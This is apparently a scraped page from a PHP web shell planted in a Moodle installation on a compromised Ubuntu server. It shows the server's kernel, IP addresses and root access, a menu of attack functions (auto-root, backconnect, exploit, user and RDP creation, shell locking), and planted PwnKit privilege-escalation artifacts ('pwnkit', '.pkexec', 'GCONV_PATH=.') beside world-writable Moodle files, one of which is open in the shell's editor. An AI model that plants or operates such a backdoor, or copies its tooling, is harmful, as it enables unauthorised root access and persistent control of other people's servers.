Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
calendar /
classes /
external /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
calendar_day_exporter.php
9.6
KB
-rwxrwxrwx
calendar_event_exporter.php
15.12
KB
-rwxrwxrwx
calendar_upcoming_exporter.php
6.09
KB
-rwxrwxrwx
date_exporter.php
2.47
KB
-rwxrwxrwx
day_exporter.php
9
KB
-rwxrwxrwx
day_name_exporter.php
2.34
KB
-rwxrwxrwx
event_action_exporter.php
3.86
KB
-rwxrwxrwx
event_exporter.php
3.41
KB
-rwxrwxrwx
event_exporter_base.php
12.98
KB
-rwxrwxrwx
event_icon_exporter.php
5.16
KB
-rwxrwxrwx
event_subscription_exporter.ph...
2.56
KB
-rwxrwxrwx
events_exporter.php
3.6
KB
-rwxrwxrwx
events_grouped_by_course_expor...
3.25
KB
-rwxrwxrwx
events_related_objects_cache.p...
8.88
KB
-rwxrwxrwx
events_same_course_exporter.ph...
2.63
KB
-rwxrwxrwx
footer_options_exporter.php
4.52
KB
-rwxrwxrwx
month_exporter.php
14.35
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
week_day_exporter.php
4.96
KB
-rwxrwxrwx
week_exporter.php
5.88
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : date_exporter.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Class for normalising the date data. * * @package core_calendar * @copyright 2017 Andrew Nicols <andrew@nicols.co.uk> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ namespace core_calendar\external; defined('MOODLE_INTERNAL') || die(); use core\external\exporter; use renderer_base; use moodle_url; /** * Class for normalising the date data. * * @package core_calendar * @copyright 2017 Andrew Nicols <andrew@nicols.co.uk> * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ class date_exporter extends exporter { /** * Constructor for date_exporter. * * @param array $data * @param array $related The related information */ public function __construct($data, $related = []) { $data['timestamp'] = $data[0]; unset($data[0]); parent::__construct($data, $related); } protected static function define_properties() { return [ 'seconds' => [ 'type' => PARAM_INT, ], 'minutes' => [ 'type' => PARAM_INT, ], 'hours' => [ 'type' => PARAM_INT, ], 'mday' => [ 'type' => PARAM_INT, ], 'wday' => [ 'type' => PARAM_INT, ], 'mon' => [ 'type' => PARAM_INT, ], 'year' => [ 'type' => PARAM_INT, ], 'yday' => [ 'type' => PARAM_INT, ], 'weekday' => [ 'type' => PARAM_RAW, ], 'month' => [ 'type' => PARAM_RAW, ], 'timestamp' => [ 'type' => PARAM_INT, ], ]; } }
Close